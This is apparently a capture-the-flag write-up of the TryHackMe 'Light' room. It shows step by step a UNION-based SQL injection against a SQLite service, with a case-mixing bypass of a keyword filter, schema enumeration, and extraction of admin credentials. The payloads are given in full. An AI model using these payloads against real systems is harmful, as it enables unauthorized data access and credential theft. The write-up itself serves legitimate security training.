> For the complete documentation index, see [llms.txt](https://0xb0b.gitbook.io/writeups/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://0xb0b.gitbook.io/writeups/tryhackme/2025/light.md).

# Light

{% embed url="<https://tryhackme.com/r/room/lightroom>" %}

The following post by 0xb0b is licensed under [CC BY 4.0<img src="https://mirrors.creativecommons.org/presskit/icons/cc.svg?ref=chooser-v1" alt="" data-size="line"><img src="https://mirrors.creativecommons.org/presskit/icons/by.svg?ref=chooser-v1" alt="" data-size="line">](http://creativecommons.org/licenses/by/4.0/?ref=chooser-v1)

***

For this challenge, we will skip the Nmap scan. The room description already asks us to connect to port `1337`. We also get a user to start with. The service on `1337` could be the aforementioned database application called Light.

<figure><img src="/files/GW7YLGOEGgfFn3VSpWHl" alt=""><figcaption></figcaption></figure>

Since this is a database challenge, we try the simplest SQL Injection payload `'`. And we get an error returned. The service might be vulnerable to SQL Injection. The error message tells us about an unrecognized token in `''' LIMIT 30"`. We may have broken the enclosed string by `'`, which led to this error.

<figure><img src="/files/4lu6EkuRImASYQX0BpuD" alt=""><figcaption></figcaption></figure>

Now, let's try to get more information using a UNION SELECT injection. But it errors with our comment we used.

```
' UNION SELECT 1 -- -
```

<figure><img src="/files/6RyeyMtVP70PTcJIeEGS" alt=""><figcaption></figcaption></figure>

Alternately, we use `#` to comment, and do not receive a similar error as before. But there are words that get blocked. It might be UNION and SELECT.

```
' UNION SELECT 1 #
```

<figure><img src="/files/XNwz3bKrPbJ7ew5yO51C" alt=""><figcaption></figcaption></figure>

We switch between capitalized and non capitalized characters. But still get an error. Might be the SELECT statement too.

```
' UniOn SELECT 1 #
```

<figure><img src="/files/5oA73NHFD3bf8woriNdf" alt=""><figcaption></figcaption></figure>

After applying the same technique to the SELECT statement, we now get a different error. The token `#` is not recognized.

```
' UniOn SeLeCt 1 #
```

<figure><img src="/files/GRrPo7JPGmyf8H1MEpGa" alt=""><figcaption></figcaption></figure>

We URL encode the `#` character, but that does not help either. But we receive another error regarding the `'` character.

```
' UniOn SeLeCt 1 %23
```

<figure><img src="/files/TXX6z5jvdrxMuPNxJJTP" alt=""><figcaption></figcaption></figure>

So maybe there is a statement like this, that gets broken with inserting a `'`:

```
SELECT * FROM users WHERE username = '{user_input}' LIMIT 30; 
```

Leading to:

```
SELECT * FROM users WHERE username = ''' LIMIT 30;
```

We close our statement with another `'`, and now have a successful UNION based injection.

```
' UniOn SeLeCt 1 '
```

<figure><img src="/files/Q7LKEZG6MIRrnKbYZgKg" alt=""><figcaption></figcaption></figure>

Next, we query for the version, to determine which DBMS is used to craft the payloads to retreive the data from the database. It is a SQLite Database version 3.31.1.

```
' UniOn SeLeCt @@version '
' UniOn SeLeCt version() '
' UniOn SeLeCt sqlite_version() '
```

<figure><img src="/files/4gPbbKOAZgOGqZHmmnHD" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/SQL%20Injection/SQLite%20Injection.md>" %}

Next we query from the `sqlite_master` to get the database structure. There is a `admintable` and a `usertable`.

```
' UniOn SeLeCt group_concat(sql) FROM sqlite_master '
```

<figure><img src="/files/wut1g6qrLMGoc6Jq2kM3" alt=""><figcaption></figcaption></figure>

We query username and password from the `usertable`, but do not find the asked information:

```
' UniOn SeLeCt group_concat(username) FROM usertable '
```

```
' UniOn SeLeCt group_concat(password) FROM usertable '
```

<figure><img src="/files/CBDIyA9TKyx6cMxN1lSM" alt=""><figcaption></figcaption></figure>

Next, we query for the username and password from the `admintable` and do find the username, password and the asked flag.

```
' UniOn SeLeCt group_concat(username) FROM admintable '
```

```
' UniOn SeLeCt group_concat(password) FROM admintable '
```

<figure><img src="/files/LJE670YJZGZWvhqG6hrl" alt=""><figcaption></figcaption></figure>
